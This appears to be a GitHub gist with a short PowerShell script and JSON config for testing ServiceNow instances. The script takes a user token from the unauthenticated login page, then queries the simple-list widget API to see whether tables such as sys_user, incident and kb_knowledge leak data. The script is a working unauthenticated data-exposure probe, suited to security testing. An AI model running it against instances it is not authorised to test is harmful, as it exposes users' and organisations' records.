@ChecksumFailed
Created October 17, 2023 20:53
ServiceNow Widget Exploit Testing

PowerShell script to test simple lis

{
    "instance": "devxxxxx",
    "widget": "widget-simple-list",
    "tables": [
        "sys_user",
        "incident",
        "kb_knowledge"
    ]
}
# Work in progress
$configFile = "config.json"
# Load instance name, widget id and the list of tables to test.
$config = Get-Content $configFile -Raw | ConvertFrom-Json

# Fetch the login page and extract the g_ck user token embedded in it.
function getUserToken {
    param (
        [Parameter(Mandatory=$False)] [string]$instance = $config.instance
    )
    $request = Invoke-WebRequest -Method GET -Uri "https://$($instance).service-now.com/login.do"
    $g_ck = $request.Content | Select-String -Pattern "g_ck = '(\w+)'" -AllMatches -CaseSensitive
    return $g_ck.Matches[0].Groups[1].Value
}

# POST to the widget API for a single table and return the web response.
function testTable {
    param (
        [Parameter(Mandatory=$False)] [string]$instance = $config.instance,
        [Parameter(Mandatory=$False)] [string]$widget = $config.widget,
        [Parameter(Mandatory=$False)] [string]$userToken = $userToken,
        [string]$tableName
    )
    $uri = "https://$($instance).service-now.com/api/now/sp/widget/$($widget)?t=$($tableName)"
    $headers = @{
        "X-UserToken"  = $userToken
        "Content-Type" = "application/json"
    }
    Invoke-WebRequest -Headers $headers -Uri $uri -Method "Post"
}

# Results keyed by table name.
$results = @{}
$userToken = getUserToken
$config.tables | ForEach-Object {
    $_  # echo the table currently being tested
    $results[$_] = testTable -tableName $_
}
$results